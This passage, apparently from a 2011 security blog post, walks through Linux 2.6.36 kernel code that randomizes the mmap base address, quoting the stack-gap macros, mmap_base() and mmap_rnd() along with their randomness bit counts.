Before we dive into the mmap(2) randomization itself, what happens with mmap(2) allocations colliding with the randomized stack space?
So, to avoid such collisions with the stack randomized virtual address space, Linux kernel developers implemented the following routine in arch/x86/mm/mmap.c file.

static unsigned int stack_maxrandom_size(void)
{
        unsigned int max = 0;
        if ((current->flags & PF_RANDOMIZE) &&
                !(current->personality & ADDR_NO_RANDOMIZE)) {
                max = ((-1U) & STACK_RND_MASK) << PAGE_SHIFT;
        }

        return max;
}


/*
 * Top of mmap area (just below the process stack).
 *
 * Leave an at least ~128 MB hole with possible stack randomization.
 */
#define MIN_GAP (128*1024*1024UL + stack_maxrandom_size())
#define MAX_GAP (TASK_SIZE/6*5)

After performing the usual checks on the currently executing task, it calculates the maximum randomized address based on the ‘STACK_RND_MASK’ value. Later on, inside mmap_base() we can see how the above C macros are used to ensure it doesn’t collide with the randomized space.

static unsigned long mmap_base(void)
{
        unsigned long gap = rlimit(RLIMIT_STACK);

        if (gap < MIN_GAP)
                gap = MIN_GAP;
        else if (gap > MAX_GAP)
                gap = MAX_GAP;

        return PAGE_ALIGN(TASK_SIZE - gap - mmap_rnd());
}

Here is also our first contact with the mmap(2) randomization routine which is, of course, through mmap_rnd(). This one is placed in arch/x86/mm/mmap.c and its code is this:

static unsigned long mmap_rnd(void)
{
        unsigned long rnd = 0;

       /*
        *  8 bits of randomness in 32bit mmaps, 20 address space bits
        * 28 bits of randomness in 64bit mmaps, 40 address space bits
        */
        if (current->flags & PF_RANDOMIZE) {
                if (mmap_is_ia32())
                        rnd = (long)get_random_int() % (1<<8);
                else
                        rnd = (long)(get_random_int() % (1<<28));
        }
        return rnd << PAGE_SHIFT;
}

Which is pretty self-explanatory code.

So, I believe this post should give readers a grasp on how Linux ASLR is implemented. I used 2.6.36 version of the Linux kernel so this might be useless for future releases but for now it is up-to-date. Any comments, corrections or suggestions are always welcome.

Written by xorl

January 16, 2011 at 21:09

Posted in linux, security